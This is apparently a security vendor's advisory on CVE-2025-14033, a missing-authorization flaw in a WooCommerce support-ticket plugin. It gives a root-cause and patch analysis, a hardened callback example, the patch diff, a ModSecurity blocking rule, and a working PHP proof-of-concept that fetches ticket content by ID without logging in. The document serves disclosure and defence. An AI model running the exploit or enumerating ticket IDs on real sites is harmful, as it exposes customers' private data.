Atomic Edge analysis of CVE-2025-14033:
This vulnerability exposes sensitive support ticket data to unauthenticated attackers. The ilGhera Support System for WooCommerce plugin registers an AJAX action that any user, logged in or not, can call. The affected function is get_ticket_content_callback in the file wc-support-system/includes/class-wc-support-system.php. By providing a numeric ticket ID, an attacker retrieves private communications and customer information. The CVSS score is 5.3, reflecting moderate severity due to confidentiality impact.
Root Cause: The vulnerability stems from a missing capability check in the get_ticket_content_callback function. The plugin registers two AJAX hooks: wp_ajax_get_ticket_content for authenticated users and wp_ajax_nopriv_get_ticket_content for unauthenticated users. Both point to the same callback method. The callback does not verify user permissions or ownership of the ticket. The only parameter required is the ticket ID. The diff shows the removal of the wp_ajax_nopriv hook, which previously exposed the endpoint to anyone. The function itself does not enforce any authorization, so removing the nopriv hook is critical.
Exploitation: An attacker sends a POST request to /wp-admin/admin-ajax.php with action=get_ticket_content and a valid ticket_id integer. The server returns the full ticket data in an AJAX response. No authentication cookie or nonce token is required. The attacker can enumerate ticket IDs sequentially to extract all support conversations. The request is simple and matches standard WordPress AJAX patterns.
Patch Analysis: The patch removes the wp_ajax_nopriv_get_ticket_content hook registration. This prevents unauthenticated users from triggering the callback via the AJAX endpoint. The wp_ajax_get_ticket_content hook remains, allowing only authenticated users (those with a WordPress session cookie) to access the action. The patch does not add a capability check inside the callback. A more complete fix would also verify the user owns or can access the requested ticket. However, the removal of the unauthenticated hook is sufficient to close the reported vulnerability.
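As an added example (not the plugin's or Atomic Edge's code), here is the callback hardened along the lines the analysis describes: nonce, login, input validation, and an ownership-or-staff check. The ticket lookup helper, the nonce action name and the 'user_id'/'content' fields are assumptions, since the plugin's storage layer is not shown on this page.

```php
<?php
// Added example, not the plugin's code: a hardened get_ticket_content handler.
// Assumes a hypothetical wss_example_load_ticket() that returns the ticket as
// an array with 'user_id' and 'content' keys, or null if it does not exist.

function wss_example_load_ticket( int $ticket_id ): ?array {
    // Placeholder for the plugin's real storage query (schema not shown here);
    // integrators hook the filter to return the ticket row.
    $ticket = apply_filters( 'wss_example_load_ticket', null, $ticket_id );
    return is_array( $ticket ) ? $ticket : null;
}

function wss_example_get_ticket_content_callback(): void {
    // 1. CSRF: require a nonce created with wp_create_nonce( 'wss_get_ticket' ).
    check_ajax_referer( 'wss_get_ticket', 'nonce' );

    // 2. Authentication: refuse anonymous callers even if someone re-adds the
    //    wp_ajax_nopriv_ hook later.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( array( 'message' => 'Authentication required.' ), 401 );
    }

    // 3. Input validation: ticket_id must be a positive integer.
    $ticket_id = isset( $_POST['ticket_id'] ) ? absint( wp_unslash( $_POST['ticket_id'] ) ) : 0;
    if ( 0 === $ticket_id ) {
        wp_send_json_error( array( 'message' => 'Invalid ticket id.' ), 400 );
    }

    // 4. Authorization: staff (manage_woocommerce) may read any ticket, everyone
    //    else only their own. Use the same 404 for "missing" and "not yours" so
    //    the response does not confirm which sequential ids exist.
    $ticket   = wss_example_load_ticket( $ticket_id );
    $is_staff = current_user_can( 'manage_woocommerce' );
    if ( null === $ticket || ( ! $is_staff && (int) $ticket['user_id'] !== get_current_user_id() ) ) {
        wp_send_json_error( array( 'message' => 'Ticket not found.' ), 404 );
    }

    wp_send_json_success( array( 'content' => $ticket['content'] ) );
}

// Register on the authenticated hook only; there is deliberately no nopriv registration.
add_action( 'wp_ajax_get_ticket_content', 'wss_example_get_ticket_content_callback' );
```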
Impact: An unauthenticated attacker can read all support tickets stored in the WordPress database. These tickets may contain sensitive customer data such as names, email addresses, order details, and personal correspondence. This information can be used for identity theft, social engineering, or competitive intelligence. The attacker does not need special privileges or knowledge beyond the ticket ID, which is a sequential integer.
Below, for reference, is the diff between the unpatched vulnerable code and the patched update.
--- a/wc-support-system/includes/class-wc-support-system.php
+++ b/wc-support-system/includes/class-wc-support-system.php
@@ -65,7 +65,6 @@
add_action( 'wp_ajax_delete-thread', array( $this, 'delete_single_thread_callback' ) );
add_action( 'wp_ajax_change-ticket-status', array( $this, 'change_ticket_status_callback' ) );
add_action( 'wp_ajax_get_ticket_content', array( $this, 'get_ticket_content_callback' ) );
- add_action( 'wp_ajax_nopriv_get_ticket_content', array( $this, 'get_ticket_content_callback' ) );
add_action( 'wp_ajax_product-select-warning', array( $this, 'product_select_warning_callback' ) );
add_action( 'wp_ajax_nopriv_product-select-warning', array( $this, 'product_select_warning_callback' ) );
add_action( 'wp_footer', array( $this, 'ajax_get_ticket_content' ) );
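Review bot: removing the wp_ajax_nopriv_get_ticket_content registration closes the unauthenticated path, but get_ticket_content_callback stays reachable by any logged-in account through the remaining wp_ajax_get_ticket_content hook, and nothing in this hunk adds a capability, ownership or nonce check to the callback. Suggest enforcing authorization inside the callback itself (check_ajax_referer() plus a comparison of the ticket's owner against get_current_user_id(), or a staff capability) so a low-privilege user cannot read other customers' tickets by id.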
--- a/wc-support-system/wc-support-system.php
+++ b/wc-support-system/wc-support-system.php
@@ -4,7 +4,7 @@
* Plugin URI: https://www.ilghera.com/product/wc-support-system/
* Description: Give support to your WooComerce customers with this fast and easy to use ticket system.
* Author: ilGhera
- * Version: 1.3.0
+ * Version: 1.3.1
* Author URI: https://ilghera.com
* Requires at least: 5.0
* Tested up to: 6.9
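Review bot: the Description line in this hunk still reads "WooComerce"; since the header is being edited for the version bump anyway, correct the spelling to "WooCommerce".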
@@ -55,7 +55,7 @@
define( 'WSS_DIR', plugin_dir_path( __FILE__ ) );
define( 'WSS_URI', plugin_dir_url( __FILE__ ) );
define( 'WSS_INCLUDES', WSS_DIR . 'includes/' );
- define( 'WSS_VERSION', '1.3.0' );
+ define( 'WSS_VERSION', '1.3.1' );
/*Files required*/
require WSS_INCLUDES . 'class-wc-support-system.php';
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:202514033,phase:2,deny,status:403,chain,msg:'CVE-2025-14033 - Unauthenticated ticket content access attempt',severity:'CRITICAL',tag:'CVE-2025-14033'"
SecRule ARGS_POST:action "@streq get_ticket_content" "chain"
SecRule ARGS_POST:ticket_id "@rx ^\d+$" ""
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14033 - ilGhera Support System for WooCommerce <= 1.3.0 - Missing Authorization to Unauthenticated Sensitive Information Exposure
$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Change this to your target
$ticket_id = 1; // The ID of the target ticket
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'get_ticket_content',
    'ticket_id' => $ticket_id
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// curl_exec() returns false on a transport error, so check it before the status code.
if ($response !== false && $http_code === 200) {
    echo "Ticket content retrieved successfully:\n";
    print_r(json_decode($response, true));
} else {
    echo "Request failed with HTTP code " . $http_code . "\n";
}